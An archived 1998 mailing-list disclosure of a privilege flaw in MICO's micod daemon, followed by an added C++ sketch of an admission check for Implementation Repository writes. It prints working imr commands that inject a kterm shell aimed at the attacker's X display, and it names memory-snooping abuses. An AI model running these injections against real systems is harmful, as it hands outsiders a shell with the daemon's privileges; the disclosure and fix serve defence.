MICO: security problem: Privileges of micod for everybody!

From: Dominique Unruh (dominiqueat_private)
Date: Sun May 10 1998 - 03:30:01 PDT


    After having installed MICO (a free CORBA-ORB for C++) I installed the
    'micod' (a daemon which is e.g. able to create objects on request).
    I put it in my boot-up scripts, so it ran as root, but this exploit will
    work too, if it is started as another user.
    
    After thinking for a moment I tried this (as guest, but could be a user
    on another system too):
    
    (micod is started on inet:winkelklinke.local:8888)
    (hacking from enfin.local, which has X on display :0)
    
    imr -ORBImplRepoAddr inet:winkelklinke.local:8888 create Play shared
    "kterm -display enfin.local:0 & echo" IDL:Anything:1.0
    imr -ORBImplRepoAddr inet:winkelklinke.local:8888 activate Play
    
    kterm will start as child of micod and connect to enfin.local:0.
    (any other program should work too, but xterm didn't start correctly, I
    don't know why)
    The 'echo' after the '&' is needed to absorb the arguments micod adds to
    the command-line.
    
    Now you can do everything.
    
    Don't underestimate the problem if micod is not installed as root:
    1. You can login, it's as good as a pwd-free guest account.
    
    2. You may control other servers started by micod or see their
    process-memory (e.g. under Linux with /proc, but there may be other ways
    on other systems), which may contain sensitive data such as access passwords,
    credit card information or whatever, depending on your application.
    
    
    I think there should be some kind of access limitation when writing
    into the Implementation Repository (the information managed by micod).
    And there should be a visible warning in the documentation.
    
    DniQ.
    
    
    PS: Hello Nahne!
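
The access limitation the post asks for, sketched as an added example (not MICO code and not part of the original message): a write to the Implementation Repository is refused unless the caller is an authorized principal, the command contains no shell metacharacters, and its executable is on an allowlist. `Registration`, `check_registration`, the principal `orbadmin` and the path `/opt/app/bin/play_server` are hypothetical, and caller authentication is assumed to happen elsewhere.

```cpp
// Added example: hypothetical admission check for Implementation Repository
// writes. Not MICO code; all names and sample values are constructed.
#include <iostream>
#include <set>
#include <sstream>
#include <string>
#include <vector>

struct Registration {
    std::string principal;  // caller identity, assumed authenticated elsewhere
    std::string name;       // entry name, e.g. "Play"
    std::string command;    // command line the daemon would run on activation
};

enum class Verdict { Accept, RejectPrincipal, RejectMeta, RejectEmpty, RejectBinary };

// Whitespace split into argv, for launching with execv() instead of a shell.
std::vector<std::string> to_argv(const std::string& cmd) {
    std::istringstream in(cmd);
    std::vector<std::string> argv;
    for (std::string tok; in >> tok;) argv.push_back(tok);
    return argv;
}

Verdict check_registration(const Registration& r,
                           const std::set<std::string>& admins,
                           const std::set<std::string>& allowed_binaries) {
    if (!admins.count(r.principal)) return Verdict::RejectPrincipal;
    // Refuse anything a shell would interpret, such as the '&' in the post.
    if (r.command.find_first_of("&;|<>`$()\\\"'\n") != std::string::npos)
        return Verdict::RejectMeta;
    const std::vector<std::string> argv = to_argv(r.command);
    if (argv.empty()) return Verdict::RejectEmpty;
    // Only executables named in the allowlist may be registered.
    if (!allowed_binaries.count(argv[0])) return Verdict::RejectBinary;
    return Verdict::Accept;
}

// Constructed policy: one admin principal, one permitted server binary.
Verdict demo(const std::string& principal, const std::string& command) {
    return check_registration({principal, "Play", command},
                              {"orbadmin"}, {"/opt/app/bin/play_server"});
}

int main() {
    std::cout << static_cast<int>(demo("guest", "kterm -display enfin.local:0 & echo")) << "\n";
    std::cout << static_cast<int>(demo("orbadmin", "/opt/app/bin/play_server --shared")) << "\n";
}
```

The checks are ordered so that an unauthorized caller learns nothing about the allowlist, and the argv split is there so an accepted entry can be launched without a shell.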
    